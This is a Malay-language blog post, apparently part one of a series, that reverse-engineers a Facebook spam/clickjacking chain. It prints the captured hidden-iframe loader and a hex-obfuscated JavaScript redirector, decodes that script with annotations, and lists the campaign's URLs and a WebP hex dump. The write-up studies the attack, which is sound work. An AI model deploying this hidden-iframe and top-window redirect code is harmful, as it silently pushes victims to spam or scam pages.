Facebook & Spam a.k.a Clickjacking Reverse Part 1



Assalamualaikum selamat malam semua...da makan...heheh harini ryu nak share pasal Facebook & Spam a.k.a Clickjacking Reverse sebab ryu slalu kena kat facebook...


Selalu post-post benda pelik ryu dapat... contoh orang tagged kita dengan benda lucah...
then ryu cuba cari url pada yang sangkut..tapi tak jumpa fine..time tu ryu kecewa..lepas tu ryu dapat isu dari student pasal benda ni..then...time ni free ryu cuba reverse apa yang ryu dapat

1st ryu dapat url ni

https://dl.dropboxusercontent.com/s/ixipmb9ctf6zpv2/7u9HdDstL4ti.html
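tapi nak buka takut..jadi kena hati-hati (lagi selamat tengok source dia je dalam VM / sandbox, jangan buka terus dalam browser yang tengah login Facebook)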

dalam source code dia

<!-- 03TGZnliRKy7Uqsbvl9CjZ7b6Xsbc2YmasXygqiJr4rdw9SEaXKWj0RVE0WJWXR1m2Reklx9aChhJIDQ0nGvz1oT1MYIOrckRnLHEgM5klTXhaNyn61j7Z7Hn76Kc5KYiFpDVYndID3Otsj2KYTOE12Mb8hhuL6Q1wJSUidzGvqhWxh8MeDraExqRnnI9QvSX8tEvRS6gpA4HkgNon33Oukc1oC4O47Z9l6VSd07LLwh9yrj0HedhkosMOTagyh8 -->
<html>
<body>
<!-- Analyst note: this first-stage page has no visible content. Its only
     element is an iframe hidden with display:none, so the second-stage page
     (spreadid.html on S3) is fetched without anything appearing on screen.
     The long random-looking comments that wrap this document do nothing when
     rendered; presumably they are padding that makes each copy of the file
     differ (not confirmed from this listing). -->
<iframe src="https://s3-sa-east-1.amazonaws.com/99876612/spreadid.html" style="display:none;"/>
</body>
</html>
<!-- 6a5mCBmLTGCtCpsgGePij9c2VjNSRSFY4LqaODur6VO6GpxuXC1qhuCTeG8eR3nJ2cPJm761XQH6ADV6hHadO31VKADerRDwRVuPvZHvDFJA8raKlX6c9KM327y7c0n1WO6mDyqP1bADpxMnflFYCOT1wZoAdYTrjpSouiqehTuLF8aGQwpCMiCAWvk0kRiJBlhUVrE8yC5NFi2VO8UbkJKf2GPuzSlE46GBpzjGmK8Ggdr8zALZLrosLADsNL1A -->

 jadi..ada lagi url yang membolehkan url ini spread data ke tempat lain..hmmm nice... lepas tu ryu cuba lihat isi dalam url tadi...


"https://s3-sa-east-1.amazonaws.com/99876612/spreadid.html"

tada...dapat isi spreadid.html ni

<html>
<!-- Analyst note: image with height 0 and no border (the width attribute is
     misspelled "widht" in the sample and is kept as captured). Loading this
     page sends a request to whos.amung.us; presumably a visit counter for the
     campaign (not confirmed from this listing). -->
<img src="http://whos.amung.us/widget/wallidtraff.pnh" widht="0" height="0" border="0" />
<script>
// Analyst notes (the code below is the sample exactly as captured):
// - _0x585c is a string table. Every entry is written with \xNN hex escapes,
//   which the JavaScript engine decodes by itself, so this is obfuscation
//   only, not encryption. Property names and URLs are looked up by index.
// - isMobile.Android / isMobile.iOS match navigator.userAgent against
//   /Android/i and /iPhone|iPad|iPod/i; is_chrome tests the lower-cased
//   user agent against /chrome/.
// - playNow() picks one rediragent.info URL per client type (Android, iOS,
//   Chrome, everything else) and assigns it to window.top.location, so the
//   whole tab is navigated, not just this frame. On Android and iOS it first
//   document.write()s a second whos.amung.us image.
// - The last table entry decodes to the string "playNow()"; setTimeout
//   evaluates that string as code after 666 ms.
// - Where the rediragent.info pages send the visitor next is decided on the
//   server and is not visible in this listing.
var _0x585c=["\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x74\x65\x73\x74","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x77\x69\x64\x67\x65\x74\x2F\x64\x72\x6F\x69\x64\x6F\x66\x66\x69\x64\x2E\x70\x6E\x68\x22\x20\x77\x69\x64\x68\x74\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x2F\x3E","\x77\x72\x69\x74\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x64\x69\x72\x61\x67\x65\x6E\x74\x2E\x69\x6E\x66\x6F\x2F\x61\x6E\x64\x72\x6F\x69\x64\x2D\x69\x64\x2E\x70\x68\x70","\x69\x4F\x53","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x77\x69\x64\x67\x65\x74\x2F\x69\x6F\x73\x6F\x66\x66\x69\x64\x2E\x70\x6E\x68\x22\x20\x77\x69\x64\x68\x74\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x2F\x3E","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x64\x69\x72\x61\x67\x65\x6E\x74\x2E\x69\x6E\x66\x6F\x2F\x69\x6F\x73\x2D\x69\x64\x2E\x70\x68\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x64\x69\x72\x61\x67\x65\x6E\x74\x2E\x69\x6E\x66\x6F\x2F\x63\x68\x72\x6F\x6D\x65\x2D\x69\x64\x2E\x70\x68\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x64\x69\x72\x61\x67\x65\x6E\x74\x2E\x69\x6E\x66\x6F\x2F\x67\x65\x6E\x65\x72\x69\x63\x2D\x69\x64\x2E\x70\x68\x70","\x70\x6C\x61\x79\x4E\x6F\x77\x28\x29"];var isMobile={Android:function (){return navigator[_0x585c[1]][_0x585c[0]](/Android/i);} ,iOS:function (){return navigator[_0x585c[1]][_0x585c[0]](/iPhone|iPad|iPod/i);} };var is_chrome=/chrome/[_0x585c[3]](navigator[_0x585c[1]][_0x585c[2]]());function playNow(){if(isMobile.Android()){document[_0x585c[5]](_0x585c[4]);window[_0x585c[7]][_0x585c[6]]=_0x585c[8];} else 
{if(isMobile[_0x585c[9]]()){document[_0x585c[5]](_0x585c[10]);window[_0x585c[7]][_0x585c[6]]=_0x585c[11];} else {if(is_chrome){window[_0x585c[7]][_0x585c[6]]=_0x585c[12];} else {window[_0x585c[7]][_0x585c[6]]=_0x585c[13];} ;} ;} ;} ;setTimeout(_0x585c[14],666);
</script>
</html>

hmmm string dalam script ni di-encode guna hex escape (\xNN) je, bukan encrypt..not bad..just reverse balik guna hexcoder ...lulz

lolol reverse dapat ni

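<html>
<!-- Image with height 0 and no border (the width attribute is misspelled
     "widht" in the sample and is kept as captured). Loading this page sends
     a request to whos.amung.us; presumably a visit counter for the campaign
     (not confirmed from this listing). -->
<img src="http://whos.amung.us/widget/wallidtraff.pnh" widht="0" height="0" border="0" />
<script>
// Decoded form of the sample's \xNN string table. The script keeps every
// property name and URL in this array and looks them up by index, so the
// index lookups below are left exactly as in the sample.
// Entries [4] and [10] contain double quotes; they are written as
// single-quoted literals because pasting the decoded text raw inside "..."
// ends the string early and the listing no longer parses.
var _0x585c = [
  "match",                                  // [0]
  "userAgent",                              // [1]
  "toLowerCase",                            // [2]
  "test",                                   // [3]
  '<img src="http://whos.amung.us/widget/droidoffid.pnh" widht="0" height="0" border="0" />', // [4]
  "write",                                  // [5]
  "location",                               // [6]
  "top",                                    // [7]
  "http://rediragent.info/android-id.php",  // [8]
  "iOS",                                    // [9]
  '<img src="http://whos.amung.us/widget/iosoffid.pnh" widht="0" height="0" border="0" />',   // [10]
  "http://rediragent.info/ios-id.php",      // [11]
  "http://rediragent.info/chrome-id.php",   // [12]
  "http://rediragent.info/generic-id.php",  // [13]
  "playNow()"                               // [14]
];

// User-agent checks for the two mobile platforms:
// navigator.userAgent.match(/Android/i) and .match(/iPhone|iPad|iPod/i).
var isMobile = {
  Android: function () {
    return navigator[_0x585c[1]][_0x585c[0]](/Android/i);
  },
  iOS: function () {
    return navigator[_0x585c[1]][_0x585c[0]](/iPhone|iPad|iPod/i);
  }
};

// /chrome/.test(navigator.userAgent.toLowerCase())
var is_chrome = /chrome/[_0x585c[3]](navigator[_0x585c[1]][_0x585c[2]]());

// Picks one rediragent.info URL per client type and assigns it to
// window.top.location, so the whole tab is navigated, not just this frame.
// Android and iOS first get a second whos.amung.us image via document.write.
// Where rediragent.info sends the visitor next is decided on the server and
// is not visible in this listing.
function playNow() {
  if (isMobile.Android()) {
    document[_0x585c[5]](_0x585c[4]);
    window[_0x585c[7]][_0x585c[6]] = _0x585c[8];
  } else if (isMobile[_0x585c[9]]()) {
    document[_0x585c[5]](_0x585c[10]);
    window[_0x585c[7]][_0x585c[6]] = _0x585c[11];
  } else if (is_chrome) {
    window[_0x585c[7]][_0x585c[6]] = _0x585c[12];
  } else {
    window[_0x585c[7]][_0x585c[6]] = _0x585c[13];
  }
}

// _0x585c[14] is the string "playNow()": setTimeout evaluates it as code
// after 666 ms.
setTimeout(_0x585c[14], 666);
</script>
</html>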

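ok..script ni hantar browser ke rediragent.info dulu (ikut Android / iOS / Chrome / lain-lain), lepas tu redirect ke web https://www0.groupdealsuccess.com/offer/gdtsbs7/?offer=gdt_081313_v12&id1=1959382435&id2=19922&session-id=0df0833265c594b7dedc5e4177da08a4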

hurmmm tapi dalam 1 web lagi..ryu dapat satu req untuk download file default.webp?

http://www.beritavideo.info/gadis/index_files/default(12).webp <---

5249 4646 d40c 0000 5745 4250 5650 3820
c80c 0000 5036 009d 012a 7800 5a00 3e29
1086 4222 0556 a1b7 0800 a12c 6671 4ecc
7f78 e777 fc87 f1de 3159 73fc 77a0 67f2
5ff0 1a61 e003 f23f fa7f e797 35f1 75f8
81eb 6be6 1e4f 4549 9fe0 0548 14a6 7fc4
3f22 3417 158b 8be6 621d f95f acdf 66e4
c7b4 48bb d887 d697 ddde feaf db8f 543f
aebe b39e 9aff c07a 477f 40d3 e1f6 84ff
05e7 55ab ab19 ae00 fdc7 c15f 067e b2fd
8ff6 ab8f 074c f98b fcab ee2f ed7c ccff
6fe1 9fc4 3d42 ff18 fe87 fe3f 8456 cc77
e5ff 65f9 51cd 5f72 f7fb 3e46 b900 f565
feef ff17 f99f 4a3f 4dff e2ff 31f0 19fc
e3fb 0ffc 1fce 0ef6 5e8b dfb0 0a7a aa00
d122 8042 22e6 7567 45d1 f657 cff4 3554
6cf9 ffcd 562a ba87 d704 69db 5a56 a7ab
f5a5 ce4d 64c0 acec a142 4491 bf4b fe84
f193 91ee 3adf 2688 7f89 8ec7 f72f 9b3a
115e 80e7 6893 6abe 97cb 6ed2 19e3 1b4c
1f57 ab17 81d8 4529 c945 dfe3 9a58 e8f3
ac5b 8b2c 5865 7587 0afa 0833 e387 74b3
5c11 361d afbf a195 07b9 68ab 24fd 28cf
2267 b11a 301f 7f5f 810b 12a2 8bb3 b51a
3549 4588 0aad e899 e34a 18d2 0f57 f9e1
ebaf 5407 ff9f 29a7 d6e0 f4ce 820f aee2
9406 636b 0ff0 fe03 f6e9 162d 576f d994
4ff2 9054 e362 1e6d 2ce6 7aca 5988 1c3b
3992 5b5a f2f3 2f16 54a0 d8b3 a87e 8000
fefd c70b fffb b07b bbe8 8cbf fffd d6dc
7b29 fffe aa4a 7fbd b181 677b db8f ae5c
524a 5b8e 44fb d11a d0d5 75f9 868c b28b
da83 c567 e862 9294 8711 cba3 b7e7 58fe
afaa c1c6 fb34 d176 a42f fcce e194 e213
e23f ad5f f7f3 199e 276e d1db 4a08 3c7f
d00b fcb8 2289 df9c f139 c62f d02d e14b
44ec 3764 90bf 7ebc 4c46 7e30 bdf8 00f9
8d78 7518 fa1a 66a0 3fdf 3c03 b9e3 1f2e
4ffe 53f0 ed0a 5898 5951 5a0a 0390 0d7b
74ed 0a5b 7efc ec93 b9a8 9539 3851 fe4a
efee 45e4 dac7 dee3 cf02 c482 7984 d829
281b 1fd7 6357 3173 cb99 46fe 557c bea0
7811 afb0 c9a6 2e5f a60c 5b74 4e7d 92bc
6231 2b34 5b8c d01b 9dd2 2d0f 3f5c 632a
a297 f615 bd2e 40d1 ff42 57b7 4347 4840
8003 64b4 84ef 2bcc 9c62 2b97 7206 b02a
4148 6ee7 7de5 82c3 4868 d4ed 48b8 fffa
11bd 9469 44cd 749a d774 e3d7 06aa d48c
1d71 a8a3 2c3f eee2 b58a 5a7e 2b1f 502c
d683 f566 a48e 44da b388 ae44 b310 a048
315e 7b8b ff4e 6cef 00db 95f2 5b24 7b6b
3f38 648b 8c05 1a4c 6c1b d11b 6806 5708
7d4c eed0 d49d 03e0 1c72 949f bccd 3f08
d523 4670 7ad4 c0e6 9f42 36b9 6c0f e9a6
f0d5 2292 a306 80ec 6235 ae1b 9c2f 5eea
643b caef f22f 5940 4c9c ba70 464c 59c4
9b67 d0c9 1a0c bb6b a4a5 f8ee 7e57 29ca
cf35 af06 299f a5b8 a653 1131 fcf8 3aac
fcc2 e9a6 88fb 48ee 44bf c345 2c04 d9d4
dbff 951f 55a5 e1e2 f1c9 9bf0 0171 b997
796f 0995 f840 694e dbe2 9167 d15f ac85
7d67 ec9e 33cf 3cbc fc67 7b1f 9f57 fd28
e504 71bd 0b41 b74b 801a 4f96 bbc2 4818
715a a435 79a8 453b a024 e5ea 1d36 3f30
4975 3b4e 35a0 6312 59d3 fe5c 3d95 0b21
fa01 1da2 a3f2 0a47 9a21 e768 3ec8 c1e3
450f 9a9d 31ce 55d0 78be 603c af65 8018
21d1 ae02 0ff8 621a 97e2 5d38 c90f cbd7
8def 51ee 0321 2bd2 30fa 85dc 0b11 a5ae
6f26 2e3d 72f2 fdc4 550d 45cf 2927 c73d
cb44 2917 a741 3860 9f84 cf8a 0950 77a0
e725 dbdd 42f8 b8f6 37d1 86ac a553 5e1f
58c3 c057 bb29 7359 d5fa 7b89 767d 4263
0925 375c 277a c52e 124c aff1 c7c5 80a1
91f9 992a a9c3 2594 8e5b 71a1 aaf3 3e34
7669 ebef 5ab1 371e f669 8abb def1 cfaa
8333 0f7b c1e5 ad85 4826 952c f7f6 4b67
41d0 3641 174b 21ce b94b 9921 de03 b47c
9789 75ba 953f 61f5 3d2c fac8 b65c b594
30b3 34df 55d5 eb7d b67b 2207 212c fd57
020c 7d3b a1bf 3fe0 d78a 3c21 3753 acc5
e449 55b7 e831 a640 4fb9 4be5 61cc a7cb
1db7 41f8 df02 e7a9 0150 97a4 9722 9ce2
894b 8bd6 6148 71ad 4ff6 99be 5f12 7f42
8d5e c5d8 9a4f bd72 5db1 d64f 9578 5005
091e 2045 83a2 bff0 4d59 c82b 3fb2 e0d1
8064 986f 5391 eaf7 f2c8 8fdc 2577 beb6
cd2e f0fa 6054 e0c7 bccd fbb9 f368 7b4c
2129 b3d3 69ee 096e 3cee f9be 8b9f 38e8
a7a3 162e 6ad4 75fc cd3f 8da9 6fcf ce14
0786 0a8a 8482 69ec 4c38 8c65 d229 822b
7757 4737 cb68 59c6 301d 81f7 2da2 7450
b409 6fc9 83d0 9f35 d1bb 47a7 58fc 5f35
c9ba 551f f9f3 5e72 a808 f940 55f5 bee7
fa85 e343 dd27 43b2 8724 f875 b5d4 f67c
1bb5 f42d f4ca 0ca5 e0ee d657 3a84 a9b9
20e6 991b 8e4d 29e6 7f0a b933 3017 2161
664f 3a08 567f 6552 dc3a a144 1307 03b8
ae21 1011 20ef 46b9 e115 91e4 260c 732c
e025 bbb8 7b4c f69b bcf7 36ca 7ce2 8371
a280 da5f 76ca c2a1 1dc2 887c 3ffc 8eed
a78f a67e d0d3 2924 f492 fc35 b07f ccc6
1dd4 4946 c5b1 7dd5 d28c 6f65 e514 97f5
4aae c7e7 72a8 7b95 1c07 9855 699e eeff
a8e5 76e5 c71d 5ccc f72a 62bd 0d34 cbe5
e4b3 a06a 518c 8923 b284 c029 7a5f bba1
3f76 0f59 987e eaf7 653c b14d 4c3d 9aec
539f 50b1 1274 20ad 39d6 17f0 1cab 29fc
5880 9d4f 4c04 f683 6f71 0f48 3bdc 69e2
cb20 e307 43d9 79cb e529 0522 ff1f 2a2f
6ee0 bb61 2d50 0638 191d aa0e a560 3ba2
f071 a146 ada5 d6bb 02b9 52d3 c37c 7e73
ea50 d3dc 1f31 2522 0126 699b ab56 43ae
1a0b cbd8 82a7 0fea 8d4d 0300 7471 96bd
f4d1 3fba 3e87 fbd5 09b4 a403 d3e9 117f
9d18 d078 4c6b 2d55 55c1 fa64 74d5 182c
db7a e7df 5620 c3ab d7cf e8fe 74e5 6e39
2ff3 c727 d47f 7317 e58a 6be9 5e73 14ae
81de bc4b c909 488a 71a5 3e5c 5161 3f4c
c99e a29f 36eb 1429 71a8 dbe9 2eb5 7efe
9e84 1a1b d59f 940a bdd0 4c82 9710 4ce3
439b 09ad 5f2d 7a78 32bc f851 7f17 16db
c13b ab3e 1d1c 1956 c1e1 79bd 4eb8 9287
dc05 737e 9180 f7e4 67bb 0775 63a9 7036
a6bd fcc6 4524 3d77 1889 b4aa 5446 d9d0
2e19 62af 0f42 8d64 6a6c 22b4 e624 0356
af92 e842 3310 7d72 7acc e9db cf4f 034f
be4f 78d2 a694 b271 c8e8 00fd 84d3 8cfb
aa36 5eda e994 a1cc 1ec5 c2d6 c6e9 32ba
2edd 40ef ce78 1baf 1abc e434 bacf 5687
bc54 0bf3 4490 338e e24b e9d9 b701 ccb3
2e06 a26c 1578 ebba de30 2300 b829 8557
3722 8b73 e5e2 5dbf 39ec d697 e803 c6f6
8bef a887 e9f8 630c 7212 a1c7 45b3 4e35
5149 8b2b 115e caec fa74 7e74 fb7d 6749
0bb2 757d 6882 6fbe 44a5 1786 bba9 3924
6e95 f3a4 16a2 62fc 0260 f170 f9e4 1b8d
fc5f 385a 643d a858 559b 9b5f 051a c6c0
fee3 ea9e a919 6ef5 548d 8218 d507 73bb
352a fc46 e6ce e04f ea98 cc90 e87e 5c9f
f758 c942 269f 7ed8 b478 06a0 96f1 4269
a246 3ddc 71f7 aba9 0433 bd8c fb90 ec7f
e66b 1a6d ca6b aa77 687a 9524 37fe 5381
0309 fc24 7a1a c689 4943 b04b fabf 9d6f
67a9 9c95 b630 4d8a 8c90 52fe 6c67 4711
33d6 e1f8 1327 5e04 8436 6905 f841 f1b4
c3c9 7dbd 6095 29aa 9e56 4a98 9427 c7f7
dd45 ae4f ce35 7072 bbbc 61d8 ec10 9ed3
bc2f 50ad ed4a ec5e 1185 6005 5d3f e15e
eeef de5c 8229 2b19 a3ba 0915 b39b 124e
d27f 9d69 4716 6aef 49af 0dc0 881b c4c1
f220 f3fd 95a2 d83d 861c 81d2 1828 e805
17c5 78ab cf94 a76f a7d1 8b05 4b93 832f
d425 0188 05f9 3ea1 5b23 25b3 956b 6d7d
6907 c542 463d 4bb0 db39 ec50 3a05 8f28
fcda 3194 0119 c1f4 c489 c9a0 8a74 f9d7
1b5f 9bc8 1b46 3810 814e fcd4 2bd9 031e
b67a 078d 575d 3f70 0cd1 69ba 0d5e c3f2
68bd e35e fc8c bee7 b1ef 185a a3d1 de49
fe90 4cfa 7771 f979 8407 0ac6 77a4 133a
911e bdd8 5c72 48f4 c763 2ab1 20f0 4b51
aaed ad90 5169 aa6c 817c 305c 6d1f 1a6b
da68 81fa 211b f1b6 f3af d997 fa58 70e9
7e97 3c77 6149 ca0b fcda 9314 1924 641f
0078 a6fa 9729 cc4c 04fc e57f 93fe b04d
21fa 4dd5 380f beb5 0ff0 ebca 0b42 03b6
891a 5042 536f b12b bd0d e177 babb d742
8dac 0b6d bb22 62ad a438 24f3 2b0c a5b7
af8f 572b 1814 831b e8da 131f f7ea fffe
5e9f fde3 414d ec2d cde9 5fa5 c3ff bcef
c979 bc12 67ff 0fdd 9420 8ed7 4ab3 998b
f88f 5188 f207 df32 f7e2 7793 386a 8e30
dfed 031f 5412 e61c aa2b 092e 5515 86cc
3ee7 ffcf f2d8 f69d ee59 4502 dde7 891c
6feb 3cb2 379c 9ddb 8fb9 751e 1f2e e8b7
f6f4 b597 b215 23e2 e091 b6df 691a 428f
7eca 0d7f 0777 2387 9f05 19e4 1ff1 04fd
7f1f daaf 4d35 9719 975b 2ce6 ea59 725b
36ec 0e1f 041c 8acd 07ee 715f a5a5 fe3a
9baa 1801 09e8 b6bc 6e10 5485 9b3c 4fb0
b879 cc44 a459 27b8 04a5 ad5f ddf8 f3ff
fe7d 3ffe b6b7 2b93 fee5 3ffe 056f a8c9
7c35 c7a1 f765 9916 5fdd 167f 13f4 2927
9fff b2f3 6b03 e30c 7f60 6617 ffd8 79b5
04b5 ae4f 5c7a 9cbf bb69 40f6 74bc 1ccc
f7cf 75fd 6557 eded 5051 ebff 30f6 cf0c
9637 a1f7 4e27 b637 a858 3d3e dded e89e
d00f f1ec eabd deb3 5614 0199 6aa6 b804
7b98 536c 76d5 7347 3a57 b33b 13a7 6753
320d 727b 06b9 80d9 e760 c7dd 6c8e cd54
6899 0511 4345 d979 40a6 ec1c 8981 9e6f
6587 7a93 2b5c b390 d809 880f 43e1 5294
7edd bef6 c374 b078 b7b0 debf 4dad 3b99
42b2 ee0f ec32 d84a 7868 1d89 1bb3 0005
367c cc8a 9a9d 6f5d b34e eeb1 8f09 66cb
cb57 adc3 f2db c9c3 249f a13e d54e 6c08
7146 1281 ca71 5a0d 962f 8368 9844 91e1
8cf8 d028 2069 14ee 13e6 edeb bf16 4178
b107 385e ddb3 80d1 cfd2 7175 9ca2 3b14
2edb ca76 77f0 1089 30fa 0ced d4da 004b
fe98 270c fefa e660 32ec 5e53 d88f 8f33
2d6c 396b 8880 592b 26b3 0de6 4c9a fcea
64bc b935 c594 af29 f948 2795 d3e8 b90e
3b34 55e5 3602 9327 0a02 e8a7 a462 4172
12c0 38a9 9626 6080 1783 b38f 7ba5 0d89
3020 0000 0000 0000 0000 0000
Malwr scan:
https://malwr.com/analysis/M2EyZjhkMjc3ZmYyNGQyZmFhNDJiMDA5NWJkZjI5YTg/

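ok...format ape ek..tengok 16 byte pertama hexdump tu: 52 49 46 46 = "RIFF", 57 45 42 50 = "WEBP", 56 50 38 20 = "VP8 " — jadi header dia memang header gambar WebP (chunk VP8), padan dengan extension .webp..try decode to jpg ni output dia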





ok...tunggu part 2 plak..ryu nak cuba tapau apa yang diorg buat...




